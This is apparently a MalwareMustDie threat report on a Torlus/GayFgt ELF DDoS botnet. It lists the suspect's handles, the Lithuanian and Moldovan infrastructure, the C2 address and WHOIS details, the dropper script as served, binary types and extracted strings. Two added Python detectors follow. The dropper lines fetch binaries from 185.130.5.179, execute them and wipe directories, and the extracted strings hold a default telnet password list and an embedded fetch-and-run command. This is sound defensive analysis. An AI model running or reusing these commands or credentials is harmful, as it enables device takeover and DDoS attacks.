- #MalwareMustDie :: malwaremustdie.org
- ###############################
- # 0x01. Cyber crime Suspect
- ###############################
- Handle: AntiChrist/Reverse/NoHacker/etc. | Origin: Noord Netherlands
- Verdict: hacks routers to plant ELF backdoor malware for DDoS attacks and other malicious purposes;
- a Lizard Squad loony and administrator of the Lizard Stresser service.
- PoC: https://pastebin.com/raw/nweQVfN6
- Profile:
- http://malwaremustdie.org/stat/antichrist.html
- ###############################
- # 0x02. Report details
- ###############################
- New malware infrastructure in Moldova & Lithuania
- Malware variant: ELF Botnet Torlus/GayFgt/Lizard Kebab, multi-architecture.
- Malware / incident reference: MMD-0052-2016 - SkidDDOS ELF infection
- http://blog.malwaremustdie.org/2016/02/mmd-0052-2016-skidddos-elf-distribution.html
- #### ELF INFECTION #######
- // infection:
- http://new.updatebits.su/get.sh (185.130.5.179)
- // updates1:
- http://new.updatebits.su/cfw.sh (185.130.5.179)
- // updates2:
- cf.updatebits.su (208.67.1.66)
- //CNC:
- 176.123.7.70:168
- hostname: 176-123-7-70.alexhost.md (176.123.7.70)
- Connection to 176.123.7.70 168 port [tcp/*] succeeded!
- // domain:
- domain: UPDATEBITS.SU
- nserver: amy.ns.cloudflare.com.
- nserver: art.ns.cloudflare.com.
- state: REGISTERED, DELEGATED
- person: Private Person
- e-mail: zefknot@gmx.com
- registrar: R01-REG-FID
- created: 2015.11.28
- paid-till: 2016.11.28
- free-date: 2016.12.31
- source: TCI
- #### PAYLOAD SERVER #######
- HTTP/1.1 200 OK
- Date: Sat, 27 Feb 2016 13:28:25 GMT
- Server: Apache/2.2.15 (CentOS)
- Last-Modified: Fri, 26 Feb 2016 22:13:32 GMT
- ETag: "14202b6-703-52cb39c0a08f2"
- 200 OK
- #### LOCATION ######
- [
-   {
-     "ip": "185.130.5.179",
-     "hostname": "new.updatebits.su",
-     "city": "",
-     "region": "",
-     "country": "LT",
-     "loc": "56.0000,24.0000",
-     "org": "AS60117 Host Sailor Ltd."
-   },
-   {
-     "ip": "176.123.7.70",
-     "hostname": "176-123-7-70.alexhost.md",
-     "city": "Chisinau",
-     "region": "Municipiul Chisinau",
-     "country": "MD",
-     "loc": "47.0056,28.8575",
-     "org": "AS200019 ALEXHOST SRL"
-   },
-   {
-     "ip": "208.67.1.66",
-     "hostname": "cf.updatebits.su",
-     "city": "Kansas City",
-     "region": "Missouri",
-     "country": "US",
-     "loc": "39.1472,-94.5735",
-     "org": "AS33387 DataShack, LC",
-     "postal": "64116"
-   }
- ]
- #### PAYLOADS #######
- -------------------
- ulimit -n 712
- cd /tmp || cd /var/run;rm -rf *;busybox wget http://185.130.5.179/d11 || wget http://185.130.5.179/d11;cat d11 >busybox;chmod 777 busybox;./busybox
- cd /tmp || cd /var/run;rm -rf *;busybox wget http://185.130.5.179/d8 || wget http://185.130.5.179/d8;cat d8 >busybox;chmod 777 busybox;./busybox
- cd /tmp || cd /var/run;rm -rf *;busybox wget http://185.130.5.179/d7 || wget http://185.130.5.179/d7;cat d7 >busybox;chmod 777 busybox;./busybox
- cd /tmp || cd /var/run;rm -rf *;busybox wget http://185.130.5.179/d1 || wget http://185.130.5.179/d1;cat d1 >busybox;chmod 777 busybox;./busybox
- cd /tmp || cd /var/run;rm -rf *;busybox wget http://185.130.5.179/d2 || wget http://185.130.5.179/d2;cat d2 >busybox;chmod 777 busybox;./busybox
- cd /tmp || cd /var/run;rm -rf *;busybox wget http://185.130.5.179/d3 || wget http://185.130.5.179/d3;cat d3 >busybox;chmod 777 busybox;./busybox
- cd /tmp || cd /var/run;rm -rf *;busybox wget http://185.130.5.179/d4 || wget http://185.130.5.179/d4;cat d4 >busybox;chmod 777 busybox;./busybox
- cd /tmp || cd /var/run;rm -rf *;busybox wget http://185.130.5.179/d5 || wget http://185.130.5.179/d5;cat d5 >busybox;chmod 777 busybox;./busybox
- cd /tmp || cd /var/run;rm -rf *;busybox wget http://185.130.5.179/d6 || wget http://185.130.5.179/d6;cat d6 >busybox;chmod 777 busybox;./busybox
- cd /tmp || cd /var/run;rm -rf *;busybox wget http://185.130.5.179/d9 || wget http://185.130.5.179/d9;cat d9 >busybox;chmod 777 busybox;./busybox
- cd /tmp || cd /var/run;rm -rf *;busybox wget http://185.130.5.179/d10 || wget http://185.130.5.179/d10;cat d10 >busybox;chmod 777 busybox;./busybox
- cd /tmp || cd /var/run;rm -rf *;busybox wget http://185.130.5.179/d12 || wget http://185.130.5.179/d12;cat d12 >busybox;chmod 777 busybox;./busybox
- rm -rf /tmp/1*
- rm -rf /var/run/*
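The lines above are the dropper exactly as it was served. As an added example (not part of the MalwareMustDie report), the Python below pulls the distribution host and payload names out of such a script and flags the stage / wipe / busybox-fetch / masquerade / execute pattern, so a honeypot or telnet-log pipeline can alert on it. The marker regexes are an assumed signature written for this page, and the sample script is two of the dropper lines above plus its cleanup lines.

```python
import re
from collections import Counter

# Constructed sample: two of the dropper lines from the PAYLOADS section plus its cleanup lines.
DROPPER_SAMPLE = """ulimit -n 712
cd /tmp || cd /var/run;rm -rf *;busybox wget http://185.130.5.179/d11 || wget http://185.130.5.179/d11;cat d11 >busybox;chmod 777 busybox;./busybox
cd /tmp || cd /var/run;rm -rf *;busybox wget http://185.130.5.179/d8 || wget http://185.130.5.179/d8;cat d8 >busybox;chmod 777 busybox;./busybox
rm -rf /tmp/1*
rm -rf /var/run/*
"""

# host and path of every http(s) URL on a line; the path stops at whitespace or a shell separator
URL_RE = re.compile(r"https?://([^/\s;|]+)/([^\s;|]+)")

# Behavioural markers of this dropper, one regex each (assumed signature, not a published one):
# stage in a world-writable dir, wipe it, fetch with busybox wget, write the payload over a
# file named "busybox", then chmod and execute it.
MARKERS = {
    "stage_dir": re.compile(r"cd /tmp \|\| cd /var/run"),
    "wipe_stage": re.compile(r"rm -rf \*"),
    "busybox_fetch": re.compile(r"busybox wget "),
    "masquerade": re.compile(r"cat \S+ >busybox"),
    "exec_dropped": re.compile(r"chmod 777 busybox;\./busybox"),
}


def analyse_dropper(script):
    """Return distribution hosts, payload names (in order seen) and marker hit counts."""
    hosts, payloads, hits = Counter(), [], Counter()
    for line in script.splitlines():
        for host, path in URL_RE.findall(line):
            hosts[host] += 1
            if path not in payloads:
                payloads.append(path)
        for name, rx in MARKERS.items():
            if rx.search(line):
                hits[name] += 1
    return {"hosts": dict(hosts), "payloads": payloads, "marker_hits": dict(hits)}


def is_dropper_line(line, min_markers=4):
    """True when one line trips at least min_markers markers (an ordinary wget line trips 0 or 1)."""
    return sum(1 for rx in MARKERS.values() if rx.search(line)) >= min_markers


def find_dropper_lines(script, min_markers=4):
    """1-based line numbers in script that look like this dropper."""
    return [i for i, line in enumerate(script.splitlines(), 1) if is_dropper_line(line, min_markers)]


if __name__ == "__main__":
    print(analyse_dropper(DROPPER_SAMPLE))
    print("dropper lines:", find_dropper_lines(DROPPER_SAMPLE))
```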
- #### BINS #######
- --------------------
- d1: ELF 32-bit LSB executable, ARM, version 1, statically linked, not stripped
- d10:ELF 32-bit MSB executable, PowerPC or cisco 4500, version 1 (SYSV), statically linked, not stripped
- d11:ELF 64-bit LSB executable, x86-64, version 1 (SYSV), statically linked, not stripped
- d12:ELF 32-bit LSB executable, Renesas SH, version 1 (SYSV), statically linked, not stripped
- d2: ELF 32-bit LSB executable, ARM, version 1, statically linked, not stripped
- d3: ELF 32-bit LSB executable, ARM, EABI4 version 1 (SYSV), statically linked, not stripped
- d4: ELF 32-bit LSB executable, Intel 80386, version 1 (SYSV), statically linked, not stripped
- d5: ELF 32-bit LSB executable, Intel 80386, version 1 (SYSV), statically linked, not stripped
- d6: ELF 32-bit MSB executable, Motorola m68k, 68020, version 1 (SYSV), statically linked, not stripped
- d7: ELF 32-bit LSB executable, MIPS, MIPS-I version 1 (SYSV), statically linked, not stripped
- d8: ELF 32-bit MSB executable, MIPS, MIPS-I version 1 (SYSV), statically linked, not stripped
- d9: ELF 32-bit MSB executable, PowerPC or cisco 4500, version 1 (SYSV), statically linked, not stripped
- #### HASHES #######
- --------------------
- #### SNIPS #######
- --------------------
- .rodata:0x0805CD40 176.123.7.70:168
- .rodata:0x0805CD51 root
- .rodata:0x0805CD57 admin
- .rodata:0x0805CD5E user
- .rodata:0x0805CD64 login
- .rodata:0x0805CD6B guest
- .rodata:0x0805CD72 support
- .rodata:0x0805CD7B cisco
- .rodata:0x0805CD82 toor
- .rodata:0x0805CD88 changeme
- .rodata:0x0805CD92 1234
- .rodata:0x0805CD98 12345
- .rodata:0x0805CD9F 123456
- .rodata:0x0805CDA7 default
- .rodata:0x0805CDB0 pass
- .rodata:0x0805CDB6 password
- .rodata:0x0805CDC0 vizxv
- .rodata:0x0805CDC7 (null)
- .rodata:0x0805CDCE buf: %s\n
- .rodata:0x0805CDD7 -c
- .rodata:0x0805CDDA sh
- .rodata:0x0805CDDD /bin/sh
- .rodata:0x0805D200 /proc/cpuinfo
- .rodata:0x0805D20E BOGOMIPS
- .rodata:0x0805D217 PING
- .rodata:0x0805D21C :>%$#
- .rodata:0x0805D223 %d.%d.%d.%d
- .rodata:0x0805D22F %d.%d.%d.0
- .rodata:0x0805D23A ogin:
- .rodata:0x0805D240 \r\n
- .rodata:0x0805D243 assword:
- .rodata:0x0805D24C ncorrect
- .rodata:0x0805D255 sh\r\n
- .rodata:0x0805D25A shell\r\n
- .rodata:0x0805D264 cd /tmp || cd /var/run; rm -rf *; busybox wget http://new.updatebits.su/cfw.sh || wget http://new.updatebits.su/cfw.sh; sh cfw.sh; rm -rf cfw.sh; busybox tftp -r tft.sh -g cf.updatebits.su || tftp -r tft.sh -g cf.updatebits.su; sh tft.sh; rm -rf tft.sh\r\n
- .rodata:0x0805D364 /bin/busybox;echo -e 'gayfgt'\r\n
- .rodata:0x0805D384 ulti-call
- .rodata:0x0805D38E REPORT %s:%s:%s
- .rodata:0x0805D39E gayfgt
- .rodata:0x0805D3D8 Failed opening raw socket.
- .rodata:0x0805D3F4 Failed setting raw headers mode.
- .rodata:0x0805D415 all
- .rodata:0x0805D41B syn
- .rodata:0x0805D41F rst
- .rodata:0x0805D423 fin
- .rodata:0x0805D427 ack
- .rodata:0x0805D42B psh
- .rodata:0x0805D42F Invalid flag \"%s\"
- .rodata:0x0805D441 PONG!
- .rodata:0x0805D447 GETLOCALIP
- .rodata:0x0805D452 My IP: %s
- .rodata:0x0805D45C SCANNER
- .rodata:0x0805D464 SCANNER ON | OFF
- .rodata:0x0805D475 OFF
- .rodata:0x0805D479 ON
- .rodata:0x0805D47C FORK
- .rodata:0x0805D481 HOLD
- .rodata:0x0805D486 JUNK
- .rodata:0x0805D48B UDP
- .rodata:0x0805D48F TCP
- .rodata:0x0805D493 KILLATTK
- .rodata:0x0805D49C Killed %d.
- .rodata:0x0805D4A7 None Killed.
- .rodata:0x0805D4B4 LOLNOGTFO
- .rodata:0x0805D4BE 8.8.8.8
- .rodata:0x0805D4C6 /proc/net/route
- .rodata:0x0805D4D6 \t00000000\t
- .rodata:0x0805D4E1 [cpuset]
- .rodata:0x0805D4EA fork failed\n
- .rodata:0x0805D4F9 FAILED TO CONNECT
- .rodata:0x0805D50B PONG
- .rodata:0x0805D510 DUP
- .rodata:0x0805D514 SH
- .rodata:0x0805D517 %s 2>&1
- .rodata:0x0805D523 LINK CLOSED
- .rodata:0x0805D564 0.9.30
- .rodata:0x0805DBC8 -c
- .rodata:0x0805DBCB /bin/sh
- .rodata:0x0805DE2C /dev/null
- .rodata:0x0805DE74 clntudp_create: out of memory\n
- .rodata:0x0805DEE0 bad auth_len gid %d str %d auth %d\n
- .rodata:0x0805DF04 xdr_string: out of memory\n
- .rodata:0x0805DF1F xdr_bytes: out of memory\n
- .rodata:0x0805DF68 (nil)
- .rodata:0x0805DF6E (null)
- .rodata:0x0805DFC5 npxXoudifFeEgGaACScs
- .rodata:0x0805EB90 __get_myaddress: socket
- .rodata:0x0805EBA8 __get_myaddress: ioctl (get interface configuration)
- .rodata:0x0805EBDD __get_myaddress: ioctl
- .rodata:0x0805EBF4 Cannot register service
- .rodata:0x0805EC1C xdr_array: out of memory\n
- .rodata:0x0805EC38 /etc/resolv.conf
- .rodata:0x0805EC49 /etc/config/resolv.conf
- .rodata:0x0805EC61 nameserver
- .rodata:0x0805EC6C domain
- .rodata:0x0805EC73 search
- .rodata:0x0805EC7A %s%s%m\n
- .rodata:0x0805ED5C RPC: (unknown error code)
- .rodata:0x0805ED76 %s:
- .rodata:0x0805ED7F ; errno = %s
- .rodata:0x0805ED8C ; low version = %lu, high version = %lu
- .rodata:0x0805EDB4 ; why =
- .rodata:0x0805EDBD (unknown authentication error - %d)
- .rodata:0x0805EDE1 ; s1 = %lu, s2 = %lu
- .rodata:0x0805F1D4 %x
- .rodata:0x0805F1D7 0123456789abcdef
- .rodata:0x0805F1E8 /etc/hosts
- .rodata:0x0805F1F3 /etc/config/hosts
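As an added example, not from the report, the Python below is a triage routine over a strings(1)-style dump like the one above: it checks for the bot's family markers, extracts the C2 ip:port, confirms the truncated telnet-prompt matching that the scanner relies on, and lists the control verbs present. The sample list is constructed from the strings above; the marker and verb sets are my own choice for this page, not a published signature.

```python
import re

# Constructed sample: a subset of the .rodata strings listed above, as strings(1) would print them.
STRINGS_SAMPLE = [
    "176.123.7.70:168", "root", "admin", "(null)", "buf: %s\\n", "/bin/sh",
    "/proc/cpuinfo", "BOGOMIPS", "PING", "ogin:", "\\r\\n", "assword:", "ncorrect",
    "/bin/busybox;echo -e 'gayfgt'\\r\\n", "REPORT %s:%s:%s", "gayfgt",
    "PONG!", "GETLOCALIP", "SCANNER ON | OFF", "HOLD", "JUNK", "UDP", "TCP",
    "KILLATTK", "LOLNOGTFO", "8.8.8.8", "/proc/net/route", "clntudp_create: out of memory\\n",
]

# Strings peculiar to this bot build (assumed marker set, chosen from the dump above).
FAMILY_MARKERS = {"gayfgt", "LOLNOGTFO", "KILLATTK", "SCANNER ON | OFF",
                  "GETLOCALIP", "REPORT %s:%s:%s"}
# Truncated prompt fragments the telnet scanner matches against a target's banner.
TELNET_PROMPTS = {"ogin:", "assword:", "ncorrect"}
# Control/attack verbs the C2 can send, taken from the dump above.
BOT_COMMANDS = {"PING", "GETLOCALIP", "SCANNER", "HOLD", "JUNK", "UDP", "TCP",
                "KILLATTK", "LOLNOGTFO", "DUP", "SH"}
# a hard-coded C2 endpoint looks like "a.b.c.d:port" on its own line
C2_RE = re.compile(r"^(\d{1,3}(?:\.\d{1,3}){3}):(\d{1,5})$")


def triage(strings):
    """Classify one binary's string dump and pull out what a responder needs to block and hunt."""
    present = set(strings)
    markers = sorted(present & FAMILY_MARKERS)
    c2 = [(m.group(1), int(m.group(2))) for s in strings if (m := C2_RE.match(s))]
    return {
        # three or more markers is a confident call; one or two may just be shared code
        "family": "Torlus/GayFgt" if len(markers) >= 3 else "unknown",
        "markers": markers,
        "c2": c2,
        "telnet_scanner": TELNET_PROMPTS <= present,  # all three prompt fragments present
        "commands": sorted(present & BOT_COMMANDS),
    }


def block_list(report):
    """Firewall-ready 'ip:port' strings for the C2 endpoints found."""
    return [f"{ip}:{port}" for ip, port in report["c2"]]


if __name__ == "__main__":
    rep = triage(STRINGS_SAMPLE)
    print(rep)
    print("block:", block_list(rep))
```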
- ###############################
- # 0x03. Contact us for more information
- ###############################
- Twitter: @malwaremustdie (Direct Message)
- warning: your IP/location will be scanned & conversation is recorded
- Come clean & stay safe!
- #MalwareMustDie!
- [EOF]